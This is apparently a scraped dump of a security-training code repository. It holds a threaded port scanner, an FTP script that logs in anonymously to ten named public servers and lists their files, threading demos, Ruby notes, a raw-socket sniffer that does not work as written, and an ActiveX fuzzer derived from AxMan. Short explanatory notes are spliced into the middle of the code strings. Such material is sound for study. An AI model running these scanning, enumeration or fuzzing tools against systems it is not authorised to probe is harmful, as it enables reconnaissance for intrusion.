ports:\n thread = threading.Thread(target=check_port, args=(host, port))\n thread.start() #yeah thats really all you need\n threads.append(thread)\n # for thread in threads:\n # thread.join()\n\n''' Main '''\ndef main():\n ''' Parse Arguments '''\n # old way was a bit dirty, this is legit though\n parser = argparse.ArgumentParser()\n # add options\n parser.add_argument('-n', 
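xmascan.py above works with raw TCP flag values: the probe sends flags="FPU" (FIN+PSH+URG, the "xmas tree" lights), and the 0x14 in the closed branch is RST+ACK. A small pure-Python helper that makes those byte values readable (no scapy required; the name decode_flags is made up for illustration):

TCP_FLAGS = {0x01: "FIN", 0x02: "SYN", 0x04: "RST",
             0x08: "PSH", 0x10: "ACK", 0x20: "URG"}

def decode_flags(value):
    # names of every flag bit set in the byte
    return [name for bit, name in sorted(TCP_FLAGS.items()) if value & bit]

print(decode_flags(0x14))   # ['RST', 'ACK'] - the closed-port reply
print(decode_flags(0x29))   # ['FIN', 'PSH', 'URG'] - the xmas probe itself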
action='store', dest='host', help='Name or IP of the node you want to scan.')\n    parser.add_argument('-p', action='append', dest='ports', default=[], help='Port or port range. You can add multiple -p(s)')\n    # parse\n    args = parser.parse_args()\n\n    if DEBUG:\n        print 'Args: '\n        pp.pprint(args)\n\n    ''' Make sure we have what we need, and can reach the target '''\n    # we cant run if we dont have ports\n    if len(args.ports) == 0:\n        parser.print_help()\n        sys.exit(\"No ports or port ranges provided\")\n    # we can ask for a host to scan\n    if len(args.host) == 0:\n        host = raw_input(\"Enter hostname or IP to scan: \")\n    else:\n        host = args.host\n    # get ip if we have name, get name if we have ip\n    try:\n        host_ip = socket.gethostbyname(host)\n    except:\n        sys.exit('Host name or IP could not be found')\n\n    ports=list()\n    for port in args.ports:\n        if port.isdigit():\n            ports.append(int(port))\n        else:\n            try:\n                port_range = port.split('-')\n                port_range = range(int(port_range[0]), int(port_range[1]))\n                ports += port_range\n            except:\n                print 'Invalid port range %s' % port\n    if DEBUG:\n        print 'Ports: '\n        pp.pprint(ports)\n\n    scan(host, ports)\n\nif __name__ == '__main__':\n    main()" }, { "alpha_fraction": 0.5221739411354065, "alphanum_fraction": 0.5291304588317871, "avg_line_length": 28.84415626525879, "blob_id": "4c067962340e6b21a3b8015b61ceb96c6eecbb96d", "content_id": "d3c02f5efd6c40b5aae1ca3352db053ab5c8d8a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2300, "license_type": "no_license", "max_line_length": 102, "num_lines": 77, "path": "/python/Module-2/ftp_enum.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# py2\n# NOTE === not the most useful script - better to have this functionality built into something else\n# PURPOSE === build list of 10 ftp sites start 5 threads that rtrv 2 from the queue, log in, list dir\n# -- fulfills SPSE threading/locking/ftp exercises\n\n__author__ = 'ma11ock'\n\nimport threading, Queue, time, sys\nfrom ftplib import FTP\n\nftp_sites = [\n    \"ftp.leadtek.com.tw\",\"ftp.gbnet.net\",\"ftp.muze.nl\",\n    \"ftp.radius.cistron.nl\",\"ftp.sci.kun.nl\",\"ftp.stack.nl\",\n    \"ftp.th.vu.nl\",\"ftp.tue.nl\",\"ftp.vu.nl\",\n    \"ftp.corel.ca\"\n    ]\n\nlock = threading.Semaphore(value=1)\n\n\nclass WorkerThread(threading.Thread):\n    def __init__(self,queue):\n        threading.Thread.__init__(self)\n        self.queue = queue\n\n    def ftp(self):\n        site = self.queue.get()\n        site2 = self.queue.get()\n        lock.acquire()\n        try:\n            print \"------------------------\"\n            print \"CONNECTING to: %s\" % site\n            print \"CONNECTING to: %s\" % site2\n            ftp = FTP(site) # connect to host, default port\n            ftp2 = FTP(site2)\n            print \"LOGGING in to: %s\" % site\n            print \"LOGGING in to: %s\" % site2\n            ftp.login() # user anonymous, passwd anonymous@\n            ftp2.login()\n            print \"----- dir contents -----\\n\"\n            ftp.dir() # list directory contents\n            print \"----- dir contents -----\\n\"\n            ftp2.dir()\n            print \"\\nEXITING: %s \" % site\n            print \"EXITING: %s \" % site2\n        except:\n            sys.exit(\"permission denied\")\n        finally:\n            lock.release()\n            self.queue.task_done()\n            self.queue.task_done()\n\n\n    def run(self):\n        # put wtv code we want to run here\n        print \"In WorkerThread\"\n        while True:\n            WorkerThread.ftp(self)\n\nqueue = Queue.Queue()\nfor j in ftp_sites:\n    queue.put(j)\n\nfor i in range(5):\n    lock.acquire()\n    print 
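portscanner.py above serializes console output with threading.Semaphore(value=1) so thread prints do not interleave. The same idea in isolation - a plain Lock used as a context manager is the tidier form (worker names are invented for the demo):

import threading

print_lock = threading.Lock()

def report(n):
    with print_lock:   # one thread writes to the console at a time
        print("worker %d reporting" % n)

threads = [threading.Thread(target=report, args=(i,)) for i in range(5)]
for t in threads:
    t.start()
for t in threads:
    t.join()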
\"WorkerThread %d Created!\" % i\n lock.release()\n\nqueue.join()\n\nprint\nprint \"All tasks complete\"\n\n\n" }, { "alpha_fraction": 0.6755092144012451, "alphanum_fraction": 0.6807200312614441, "avg_line_length": 42.081634521484375, "blob_id": "41d0dc223621b91ba3dde946201b3574b09deb72", "content_id": "aa9dc2e87cf9ec5352c2f9d7af16de8243fe6c4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2111, "license_type": "no_license", "max_line_length": 388, "num_lines": 49, "path": "/python/Module-2/queue.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# py2.7\n__author__ = 'ma11ock'\n\nimport threading, Queue, time\n\nclass WorkerThread(threading.Thread):\n def __init__(self,queue):\n threading.Thread.__init__(self)\n self.queue = queue\n\n def run(self):\n # put wtv code we want to run here\n print \"In WorkerThread\"\n while True:\n # rmv & rtrn item from queue,if optional args block = true & timeout = None (default), block if necessary until item is available,if timeout = pos num, it blocks at most timeout secs & raises Empty exception if no item was available within that time. Otherwise block = false, rtrn an item if one is immed available, else raise-Empty exception (timeout is ignored in that case)\n counter = self.queue.get()\n print \"counter: %d\" % counter\n print \"Ordered to sleep for %d seconds!\" % counter\n time.sleep(counter)\n print \"Finished sleeping for %d seconds\" % counter\n # for each get() used to fetch task,subsequent call to task_done() tells queue that processing on task is complete\n self.queue.task_done()\n\n# FIFO queue,maxsize-int that sets upper limit on # of items that can be placed queue\n# Insertion will block when size has been reached, until queue items are consumed\n# If maxsize <= 0, queue size is infinite\nqueue = Queue.Queue()\n\n# creating our threads\nfor i in range(10):\n print \"Creating WorkerThread: %d\" % i\n worker = WorkerThread(queue)\n # bool set b4 start() initial val inherited from the creating thread but main thread is not daemon so all threads in main thread default to daemon = False\n worker.setDaemon(True)\n worker.start()\n print \"WorkerThread %d Created!\" % i\n\n# building our queue\nfor j in range(10):\n queue.put(j)\n\n# blocks until all items in queue r rtrvd & processed\n# count of unfinished tasks goes up when item is added to queue\n# count dec when consumer thread calls task_done() -indicate item was rtrvd & all work is complete\n# join() unblocks if count of unifished tasks = 0\nqueue.join()\n\nprint \"All tasks complete\"\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5243445634841919, "avg_line_length": 15.121212005615234, "blob_id": "3d212965dfeb499115d03f4bda92197e6977be15", "content_id": "94969be43388619171ee34ec769ea8f6b4feeca3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "no_license", "max_line_length": 42, "num_lines": 33, "path": "/python/Module-1/loops.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# name = input(\"What is your name?\")\n#\n# print(\"Your name is \" + name)\n#\n# if name == \"ja\":\n# print(\"you are \" + name)\n# print(\"buster\")\n# elif name == \"jarrod\":\n#\n# else:\n# print(\"Unknown\")\n\ncond = True\n\nwhile cond:\n age = int(input(\"what is your age? 
\"))\n if age > 10:\n print(\"Your age is > 10\")\n else:\n print(\"your age is <= 10\")\n cond = False\nelse:\n print(\"i die\")\n\nitems = [1, 3, 4]\n\nfor num in items:\n print(num)\n\nfor item in range(1, 10, 2):\n print(item)\n\n\n" }, { "alpha_fraction": 0.6346049308776855, "alphanum_fraction": 0.6419618725776672, "avg_line_length": 21.114458084106445, "blob_id": "cb3f0a3cd2a9ed117cc7e271d7d0c2b288355dde", "content_id": "b8366bf70baeba9766f6f8d1682ba173b26fc82e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 3670, "license_type": "no_license", "max_line_length": 105, "num_lines": 166, "path": "/ruby/psFund/flowControl.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "num = 5\nline = if num > 3 then \"blah\" else \"poo\" end\n\n# only false and nil eval to false\n\n# if not is same as unless\n\n# ternary - condition ? do_this : else_do_this\n# can work well for short statement but nothing complex\n\n# += -= ||= or equal\n\n# ship ||= Spaceship.new - less verbose\n# ship = Spaceship.new unless ship - create new ship unless if exists or true\n\n# this doesn't work -undef var\n# a || a = 10\n# # if var doesn't exist it is assigned nil see below - doesn't work with bool\n# a ||= 10\n# b = 20 if false\n#\n# flag ||= true\n# flag = false\n# flag ||= true\n\n# FLOW CONTROL\n\n# || or vs && and\n# and / or have much lower precedence than && / ||\n# && higher precedence than ||\n# and / or have the same precedence\n\n# - use && || in conditional statements\n# - use and or for flow control\n\n# if engine.cut_out?\n# engine.restart or enable_emergency_power\n# end\n#\n# if engine.cut_out?\n# enable_emergency_power unless engine.restart\n# end\n\n# begin, until, while\n# begin end - execute at least once , like do - while\n# begin\n# lightning.start_flashing\n# sound.play\n# end while on_alert?\n#\n# begin\n# ship.accelerate\n# dosome.more_stuff\n# end until ship.at_veloc?\n\n# 1.upto(100) do |num|\n# puts \"num = \" + num.to_s\n# if num % 15 == 0\n# puts \"fizzbuzz\"\n# elsif num % 3 == 0\n# puts \"fizz\"\n# elsif num % 5 == 0\n# puts \"buzz\"\n# end\n# end\n\n# while msg = coms.get_msg\n# next if msg.type == \"sync\"\n# msg.process\n# end\n\n# while msg = coms.get_msg\n# msg.process\n# break if msg.type == \"voice\"\n# end\n#\n# i = 0\n# while i < 3\n# print \"enter pos num: \" # <- redo starts back on this line w/o re-eval while\n# input = gets.to_i\n# redo if input <= 0\n# i += 1\n# end\n\n# EXCEPTIONS\n# here rescues after batten_hatches, but light_sign could also throw errors so\n# def launch\n# begin\n# batten_hatches\n# rescue\n# puts \"couldn't batten\"\n# false\n# end\n# light_sign\n# end\n# # do like this - launch will return false if error incurred for either method + prob is generic msg\n# def launch\n# batten_hatches\n# light_sign\n# true\n# rescue\n# puts \"Exception intercepted\"\n# false\n# end\n# if LightError came from StandardError and we define StdError first Light Error would never be triggered\n# StdError would catch all exceptions including LightError\n# def launch\n# batten_hatches\n# light_sign\n# true\n# rescue LightError\n# puts \"Lights not working still launch\"\n# true\n# rescue StandardError => e\n# puts e.message\n# false\n# end\n#\n# # bad idea - bc will catch SignalException and SyntaxError\n# begin\n# ship = Spaceship.new\n# ship.launch\n# rescue Exception => e\n# puts e.message\n# puts e.backtrace\n# end\n\n# RAISE EXCEPTION\n\n# don't put rtrn statement in ensure as any errors 
thrown in method will get swallowed by rtrn in ensure\n# rtrn will execute instead\n\n# def batten_hatches\n# hatch_file = File.open(\"hatches.txt\")\n# # ..\n# raise HatchError, \"Door Jammed\" if door.jammed?\n# # ..\n# true\n# rescue SystemCallError => e\n# # handle system call errors\n# false\n# else # after rescue but b4 ensure\n# puts \"Well done no exceptions\"\n# ensure # always executed\n# hatch_file.close if hatch_file\n# end\n\n# RETRY\n# xfer to beginning of begin end block or beg of method\n\n# def batten_hatches\n# hatch_list = API.request(\"/hatches\") # <--\n# # ...\n# rescue RuntimeError => e\n# attempts ||= 0\n# attempts += 1\n# if attempts < 3\n# puts e.message + \". Retrying request.\"\n# retry # <--\n# else\n# puts \"Request failed\"\n# raise\n# end\n# end\n\n# throw catch - if need exception like non linear flow control but aren't handling errors" }, { "alpha_fraction": 0.5773195624351501, "alphanum_fraction": 0.6391752362251282, "avg_line_length": 13, "blob_id": "7ab03b9c7106a8852288f76cd797d8bc42505ece", "content_id": "1ee3d8e81060411dd3790d37f4ace97bfc11dbcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 97, "license_type": "no_license", "max_line_length": 32, "num_lines": 7, "path": "/python/Module-1/pack.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\nimport pkgdemo\n\nans = pkgdemo.Calculator(10, 20)\n\nprint('%d' % ans.add())" }, { "alpha_fraction": 0.6571988463401794, "alphanum_fraction": 0.6622918844223022, "avg_line_length": 18.12359619140625, "blob_id": "64123945a71cdb71a1e4901a6c98baf88358e433", "content_id": "4f721dec762a7b7d04e1c760085e1b9999273b0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 5105, "license_type": "no_license", "max_line_length": 92, "num_lines": 267, "path": "/ruby/psFund/classesObjects.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# copy of obj\n# obj = \"my name\"\n# copy = obj\n#\n# obj.upcase!\n# puts obj\n# puts copy\n#\n# p obj.object_id\n# p copy.object_id\n#\n# # clone of obj -> new obj\n# new_obj = obj.clone\n# new_obj.downcase!\n#\n# p new_obj\n# p obj\n#\n# p new_obj.object_id\n# p obj.object_id\n\n# ATTRIBUTE ACCESSOR - INSTANCE VAR\n\n# class Spaceship\n # same as getter and setter dest methods below\n # attr_accessor :destination, :name\n # def launch(destination)\n # @destination = destination # inst var private only accessed inside methods\n # # go toward destination\n # end\n #\n # def destination\n # @destination\n # end\n #\n # def destination=(new_destination)\n # @destination = new_destination\n # end\n#\n# def cancel_launch\n# destination = \"\" # creates local var\n# self.destination = \"\"\n# end\n# end\n#\n# ship = Spaceship.new\n# ship.launch(\"Earth\")\n# p ship\n# p ship.destination = \"Earth\"\n#\n# INITIALIZE\n#\n# class Spaceship\n# def initialize(name,cargo_module_count)\n# @name = name\n# @cargo_hold = cargo_module_count\n# @power_level = 100\n# end\n# end\n#\n# ship = Spaceship.new(\"Dreadnaught\",4)\n# p ship\n#\n# class Probe\n# def deploy(deploy_time,return_time)\n# puts \"deploying\"\n# end\n# def take_sample\n# end\n# end\n#\n# # we want to take 2 different kinds of samples during our probe\n# class MineralProbe < Probe\n# def deploy(deploy_time)\n# puts \"preparing chamber\"\n# super(deploy_time, Time.now + 2 * 60 * 60)\n# end\n# def take_sample\n# end\n# end\n# class AtmosphericProbe < Probe\n# 
def take_sample\n# end\n# end\n#\n# MineralProbe.new.deploy(Time.now)\n\n# INHERITANCE - for re-using functionality not enforcing interfaces\n\n# class Probe\n# def dock\n# # probe specific\n# # docking actions\n# end\n# end\n#\n# class Lander\n# def dock\n# # lander specific\n# # docking actions\n# end\n# end\n#\n# class Spaceship\n# def capture(unit)\n# unit.dock # works on anything with dock method\n# transport_to_storage(unit)\n# end\n# end\n#\n# ship = Spaceship.new\n# ship.capture(probe)\n# ship.capture(lander)\n\n# CLASS METHODS\n# class method makes it clearer that this functionality is not reliant on obj state\n# class Spaceship\n# def self.thruster_count\n# 2\n# end\n# end\n\n# Spaceship.thruster_count\n# ship = Spaceship.new # this work\n# ship.thruster_count # this !work\n\n# CLASS VARIABLES\n# 1 copy of class var & shared between all obj & subclasses of that class\n# probably best to avoid class var\n# class Spaceship\n# @@thruster_count = 2\n# def self.thruster_count\n# @@thruster_count\n# end\n# end\n#\n# class SpritelySpaceship < Spaceship\n# @@thruster_count = 4\n# end\n#\n# class EconolineSpaceship < Spaceship\n# @@thruster_count = 1\n# end\n#\n# puts SpritelySpaceship.thruster_count\n#\n# # CLASS INSTANCE VARIABLE\n# class Spaceship\n# @thruster_count = 2\n# def self.thruster_count\n# @thruster_count\n# end\n# end\n#\n# class SpritelySpaceship < Spaceship\n# @thruster_count = 4\n# end\n#\n# class EconolineSpaceship < Spaceship\n# @thruster_count = 1\n# end\n# puts \"----\"\n# puts SpritelySpaceship.thruster_count\n# puts EconolineSpaceship.thruster_count\n# puts Spaceship.thruster_count\n\n# METHOD VISIBILITY\n\n# class Spaceship\n# def launch\n# batten_hatches\n# end\n# # every method below private until changed\n# private # or the more used way\n#\n# def batten_hatches\n# puts \"what is batten?\"\n# end\n# private :batten_hatches # like this\n# end\n#\n# ship = Spaceship.new\n# ship.batten_hatches # can't do private\n# ship.send :batten_hatches\n\n# public - default\n# private - can't be called with an explicit rcvr - allows subclasses to use private methods\n# private_class_method - is used to make class methods private\n# protected - allow access for other obj of the same class\n# private & protected not used a lot\n\n# def greet(greeting)\n# puts greeting + \", captain!\"\n# end\n#\n# res = class Spaceship\n# answer = 7*6\n# puts \"Calculating in class context: \" + answer.to_s\n# greet(\"Good morning\")\n# answer\n# end\n#\n# puts \"The class calculated: \" + res.to_s\n# puts Spaceship.superclass\n\n# self refers current execution\n# inside class - refers to class self. 
class method instead of instance\n\n# perfectly valid code re-opens Spaceship class to call launch method\n\n# class Spaceship\n# def hatch\n# end\n# end\n#\n# ship = Spaceship.new\n#\n# class Spaceship\n# def launch\n# end\n# end\n#\n# ship.launch\n#\n# class Spaceship\n# def launch\n# puts \"LAUNCH\"\n# end\n# end\n#\n# ship.launch\n\n# MONKEYPATCHING - dangerous can make code brittle with new updates etc\n\nclass String\n def space\n chars.join(\" \")\n end\n\n def size\n \"Useless string\"\n end\nend\n\nputs \"canyouhearme\".space\nputs \"yesican\".size\n\n# EQUALITY\n\nclass Spaceship\n attr_reader :name\n\n def initialize(name)\n @name = name\n end\n\n def ==(other)\n name == other.name\n end\nend\n\nship1 = Spaceship.new(\"testme\")\nship2 = Spaceship.new(\"testme\")\n\n# equal should not be overwritten, this is pointer comparison...equal is identity comparison\nputs ship1.equal?(ship2)\nputs ship1 == ship2" }, { "alpha_fraction": 0.6307161450386047, "alphanum_fraction": 0.6729939579963684, "avg_line_length": 22.632652282714844, "blob_id": "ffe67ac3ecd7bbd1d6d692be8879308f5103a356", "content_id": "58cf10c008c17353190ff03bab39819c324cec12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1159, "license_type": "no_license", "max_line_length": 99, "num_lines": 49, "path": "/python/Module-3/simplesniffer.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport socket, struct, binascii\n\n\ndef ip2long(ip):\n \"\"\"\n Convert an IP string to long\n \"\"\"\n packedIP = socket.inet_aton(ip)\n return struct.unpack(\"!L\", packedIP)[0]\n\n# htons /include/linux/if_ether.h -> defined ether protocol IDs\n# need to be root for rawSockets\n# PF_INET not available\nip = socket.gethostbyname(\"ma11ock\")\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_RAW)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\nsock.bind((ip,10001))\n\n# eth hdr only -> py 3 b tells python bytes object - i hate you python!\npkt = struct.pack(\"!6s6s2s\", b'\\xaa\\xaa\\xaa\\xaa\\xaa\\xaa', b'\\xbb\\xbb\\xbb\\xbb\\xbb\\xbb', b'\\x00\\x00')\n\npkt = pkt + b'hello there'\nprint(\"pkt : \" + pkt)\n\nsock.send(pkt, ip2long(ip))\n\netherHdr = pkt[0][0:14]\n\nhdr = etherHdr.unpack(\"!6s6s2s\", etherHdr)\n\nbinascii.hexlify(hdr[0])\nbinascii.hexlify(hdr[1])\nbinascii.hexlify(hdr[2])\n\nipHdr = pkt[0][14:34]\n\nip_hdr = struct.unpack(\"!12s4s4s\",ipHdr)\n\nprint(\"Src IP = \") + socket.inet_ntoa(ip_hdr[1])\nprint(\"Dest IP = \") + socket.inet_ntoa(ip_hdr[2])\n\ntcpHdr = pkt[0][34:54]\n\ntcp_hdr = struct.unpack(\"!HH16s\", tcpHdr)\nsock.close()\n\n" }, { "alpha_fraction": 0.4847457706928253, "alphanum_fraction": 0.5294915437698364, "avg_line_length": 19.5, "blob_id": "f5ff03db28960ace8b881f25cf362f425c711000", "content_id": "12dd7d57839048e2bce753d4e4528ecb38fc17a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1475, "license_type": "no_license", "max_line_length": 116, "num_lines": 72, "path": "/ruby/psFund/standardTypes.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# encoding: US-ASCII\n# overwrites encoding\n#\n# p 0x0F\n#\n# puts \"str\".encoding\n#\n# p %q['writes',some stuff is a str]\n#\n# p \"abc\" \"def\" # concat\n\n# SYMBOLS\n# arr = %i(up down left right)\n# p arr\n# # more efficient memory & performance wise\n# \"abc\".to_sym\n#\n# # ARRAYS\n# arr = [] # way to initialize\n# arr = 
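simplesniffer.py above trips over a few struct details: unpack lives on the struct module (not on the bytes object), and the packed packet is sliced directly (pkt[0:14]) rather than indexed first. The Ethernet-header round trip it is attempting, shown on its own with made-up MAC addresses:

import struct, binascii

dst = b'\xbb\xbb\xbb\xbb\xbb\xbb'
src = b'\xaa\xaa\xaa\xaa\xaa\xaa'
ethertype = b'\x08\x00'   # IPv4

frame = struct.pack("!6s6s2s", dst, src, ethertype) + b'hello there'

eth_hdr = frame[0:14]                        # slice the packed bytes directly
d, s, t = struct.unpack("!6s6s2s", eth_hdr)  # module-level unpack
print(binascii.hexlify(d))   # bbbbbbbbbbbb
print(binascii.hexlify(s))   # aaaaaaaaaaaa
print(binascii.hexlify(t))   # 0800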
Array.new(3) # for specified # of elem\n# arr = %i(up down left right)\n#\n# p arr[0..2]\n\n# ENUMERABLES\n# var = [1,2,3].map{|v| v * 10}\n# p var\n# var = [1,2,3].reduce(0) {|sum,v| sum + v}\n# p var\n# p [3,1,3].sort\n# p [1,3,4,5,2,3].select {|n| n.even?}\n# p [1,2,3,4,5].each_cons(2) {|v| p v}\n\n# HASH\n# h = {a: \"a\", b: \"b\"}\n# h[:a]\n#\n# h.each{|v|p v}\n# h.each{|k,v|p \"#{k} #{v}\"}\n\n# RANGES\n# .. upper bound included\n# ... upper not part of max\n# (1..10).class\n# (1..10).begin\n# (1..10).end\n# (1..10).include?(20)\n# (1..10).map {|v| v*2}\n# (\"aa\"..\"bb\").each{|v|p v}\n\n# PARALLEL ASSIGNMENT & SPLAT\n# a,b = 1,2\n# p a , b\n# c = 1,2,3,4\n# p c\n#\n# def get_values\n# [1,2,3,4]\n# end\n#\n# a,b = get_values\n# p a,b # grabs first 2 elem in get_values 2nd 2 are discarded\n# first, _,_, last = get_values # will ignore _ elem and grab first and last\n# p first, last\n#\n# a,*b = get_values # a grabs 1 b will grab remainder of elems in array - SPLAT\n# a,*b,c = get_values # if SPLAT is not last it is greedy & leaves only enough elem for remaining vars\n#\n# r = (1..10)\n# p [1,2,*r]\n# h = {a: \"a\",b: \"b\",c: \"c\"}\n# p [*h]" }, { "alpha_fraction": 0.5686274766921997, "alphanum_fraction": 0.5783826112747192, "avg_line_length": 29.602985382080078, "blob_id": "2f3b3a6d7492b4d335f0ec43e6035ff596ae5954", "content_id": "3867a7b111455830a57b59ee8e9b178e8495592e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 10251, "license_type": "no_license", "max_line_length": 89, "num_lines": 335, "path": "/FaX/html/fuzzer.js", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "// Modified from HD Moore's AxMan Fuzzer\n\n// built in Alerts as delay for our POST requests to our tcp log server\n// too fast and they do not arrive for each specific argument\n// Attempt to read the value of each document property\n\n// determine browser version\nif (window.XMLHttpRequest) {\n var xhr = new XMLHttpRequest();\n} else {\n var xhr = new ActiveXObject(\"Microsoft.XMLHTTP\");\n}\n// don't actually call the log method yet anyway..only inline seems to work at the moment\n/* function log(method,msg){\n\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + msg);\n} */\n\n// delay gets script timeout\nfunction delay(time) {\n\tvar d1 = new Date();\n\tvar d2 = new Date();\n\twhile (d2.valueOf() < d1.valueOf() + time) {\n\t\td2 = new Date();\n }\n}\n\nfunction fuzzReadProperties(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all methods but the properties\n\t\tif (! (f && f['Name'] && f['Type'] == 'PropGet'))\n\t\t\tcontinue;\n\n\t\twindow.status = clsid + \" PropGet \" + f['Name'];\n\t\tmethod = \"fuzzReadProperties\";\n\n\t\ttry {\n\t\t\tvar tmp = null;\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('tmp = obj.' + f['Name']);\n\t\t} catch(e) {}\n\t}\n}\n// Attempt to set the value of each property to its initial value\nfunction fuzzReadWriteProperties(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all methods but the properties\n\t\tif (! 
(f && f['Name'] && f['Type'] == 'PropGet'))\n\t\t\tcontinue;\n\n\t\twindow.status = clsid + \" PropSet (Same) \" + f['Name'];\n\t\tmethod = \"fuzzReadWriteProperties\";\n\t\tvar tmp = null;\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('tmp = obj.' + f['Name']);\n\t\t} catch(e) {}\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('obj.' + f['Name'] + '= tmp');\n\t\t} catch(e) {}\n\t}\n}\n// Attempt to set integer properties to evilProp values\nfunction fuzzNumericProperties(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all methods but the properties\n\t\tif (! (f && f['Name'] && (f['Type'] == 'PropPut' || f['Type'] == 'PropPutRef')))\n\t\t\tcontinue;\n\n\t\twindow.status = clsid + \" PropSet (Integer) \" + f['Name'];\n\t\tmethod = \"fuzzNumericProperties\";\n\n\t\t// Read the old value so we can restore it\n\t\tvar old = null;\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('old = obj.' + f['Name']); } catch(e) {}\n\t\t// Iterate through all evilProp integer values\n\t\tfor (var x in evilPropNum) {\n\t\t\tvar tst = evilPropNum[x];\n\n\t\t\twindow.status = clsid + \" PropSet (Integer) \" + f['Name'] + ' = ' + tst;\n\t\t\tmethod = \"fuzzNumericProperties2\";\n\n\t\t\ttry {\n\t\t\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status );\n\t\t\t\t\talert(method);\n\t\t\t\t\teval('obj.' + f['Name'] + '= tst'); } catch(e) {}\n\t\t}\n\t\t// Restore the original property value\n\t\twindow.status = clsid + \" PropSet (Integer) \" + f['Name'] + ' = (old) ' + old;\n\t\tmethod = \"fuzzNumericProperties3\";\n\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('obj.' + f['Name'] + '= old'); } catch(e) {}\n\t}\n}\n\nfunction fuzzStringProperties(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all methods but the properties\n\t\tif (! (f && f['Name'] && (f['Type'] == 'PropPut' || f['Type'] == 'PropPutRef')))\n\t\t\tcontinue;\n\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'];\n\t\tmethod = \"fuzzStringProperties\";\n\t\t// Read the old value so we can restore it\n\t\tvar old = null;\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('old = obj.' 
